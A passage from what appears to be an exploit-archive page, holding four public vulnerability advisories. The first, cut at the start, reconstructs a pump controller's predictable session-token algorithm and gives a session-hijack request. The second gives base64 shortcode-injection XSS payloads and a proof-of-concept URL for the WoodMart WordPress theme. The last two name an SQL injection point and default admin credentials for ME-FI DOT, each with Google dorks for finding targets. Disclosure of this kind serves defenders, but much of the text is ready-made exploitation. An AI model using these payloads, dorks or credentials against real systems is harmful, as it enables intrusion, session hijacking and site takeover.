complete remote access. Desc: The pump controller's ELF binary Mirage_CreateSessionCode.x contains a weak session token generation algorithm that can be predicted and can aid in authentication and authorization bypass attacks. Further, session hijacking is possible due to MitM attack exploiting clear-text transmission of sensitive data including session token in URL. Session ID predictability and randomness analysis of the variable areas of the Session ID was conducted and discovered a predictable pattern. The low entropy is generated by using four IVs comprised of username, password, ip address and hostname. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5745 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5745.php 05.01.2023 -- sessionCode algorithm: ---------------------- for i in range(0, 80): foo = ord(userName[i]) + ord(userpassWord[i]) + ord(clientIP[i]) + ord(clientHost[i]) bar = foo + 7 if bar < 64 && bar > 57: bar = foo + 13 while bar > 90: bar = bar - 43 if bar < 64 && bar > 57: bar = bar - 37 sessionCode[i] += chr(bar) if sessionCode[i] == chr('\a'): sessionCode[i] = 0 break print(sessionCode.upper()) index.php (+cmdinj): -------------------- $dataRequest=$userName." ".$userPW." ".$client_IP." ".$client_HOST; $test=exec("Mirage_CreateSessionCode.x ". $dataRequest,$outData, $retVal); Session ID using user:password,ip,host 8GS1@7DB@7@@D5DKOPA@4DU4SKNH@OPNACI5JAP Session ID using admin:password,ip,host @DDUDFDIH@@@D5DKOPA@4DU4SKNH@OPNACI5JAP First 10 bytes are the user/pass combo. Hijack session: --------------- GET /menu.php?menuItem=119&userName=user&sessionCode=QKC1DHM7EFCAEC49875@CPCLCEGAP5EKI </code></pre>

<pre><code>==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2022 ] == Report Title: WordPress WoodMart Theme <= 7.1.0 - Unauthenticated Arbitrary Shortcodes Injection Google Dork: inurl:/wp-content/themes/woodmart/ Research Date: 2022-11-12 Researcher: FearZzZz [ https://fearzzzz.ru ] Component Vendor: XTemos [ https://themeforest.net/user/xtemos ] Vulnerable Version: <= 7.1.0 Component Link: https://themeforest.net/item/woodmart-woocommerce-wordpress-theme/20264492 CVSS Base Score: 8.1 (High) CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H OWASP Top 10: A03: 2021 – Injection CWE: CWE-20 CVE: CVE-2023-25790 ================================================================================================= #### [ Description: ] The WoodMart premium theme for WordPress is vulnerable to Unauthenticated Arbitrary Shortcodes Injection in versions up to, and including, v7.1.0. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. Note that the default WordPress shortcodes are relatively secure but other installed plugins often include insecure shortcodes, which allows to assess the potential attack threat as "medium" or "high". #### [ Impact: ] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. Malicious PHP code execution, the ability to gain full control over the attacked website, as well as retain access through the backdoor. #### [ Payloads: ] ][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20 ][vc_raw_js]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_js][audio%20 #### [ Proof-of-Concept: ] https://woodmart.xtemos.com/?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20&post_type=product&product_cat=lighting GET /?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20&post_type=product&product_cat=lighting HTTP/2 Host: woodmart.xtemos.com #### [ Timeline: ] 2022.11.12 - Vulnerability has been discovered. 2022.11.22 - Vendor notified, first contact attempt. No response. 2023.02.10 - Second attempt to contact the vendor. No response. 2023.02.13 - WoodMart Theme v7.1.0 released. 2023.02.13 - All the details was addressed to Envato and Patchstack. CVE ID requested. 2023.02.14 - Got a response from Envato, got a response from the vendor. 2023.02.14 - WoodMart Theme v7.1.1 released, the vulnerability has been fixed. #### [ Contacts: ] Website: fearzzzz.ru Email: fearzzzz@tutanota.com Twitter: https://twitter.com/fear_zzzz Medium: https://fearzzzz.medium.com GitHub: https://github.com/fearzzzz YouTube: https://youtube.com/@fearzzzz #### [ Notes: ] Prerequisite for successful exploitation: the "Display results from blog" option must be enabled on the target website (`&xts-woodmart-options[enqueue_posts_results]=1`). Special thanks to Mikhail Kobzarev (https://t.me/mihdan | https://wp-digest.com) for providing the original theme files. Additional greetings to Kailoon (ThemeForest Senior Reviewer, https://kailoon.com) and XTemos Studio (https://themeforest.net/user/xtemos) for the prompt response. #### [ Disclaimer: ] The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages. ========================================================================== [ www.fearzzzz.ru ] == </code></pre>

<pre><code>==================================================================================================================================== | # Title : ME-FI DOT SQL Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.3(32-bit) | | # Vendor : https://www.me-fi.com | | # Dork : "Developed by ME-FI.COM" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] http://127.0.0.1/kohkood.com/accommodation_detail.php?rid=12 <====| inject here [+] http://127.0.0.1/kohkood.com/control/ <====| Login Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : ME-FI DOT 2.2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.3(32-bit) | | # Vendor : https://www.me-fi.com | | # Dork : "Developed by ME-FI.COM" | ==================================================================================================================================== poc : [+] The vulnerability is about leaving the default settings During the installation of the script and using the default username and password [+] Dorking İn Google Or Other Search Enggine. [+] Login = user =admin pass = admin or user : admin pass : 1234 [+] http://127.0.0.1/test/login <====| Login Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>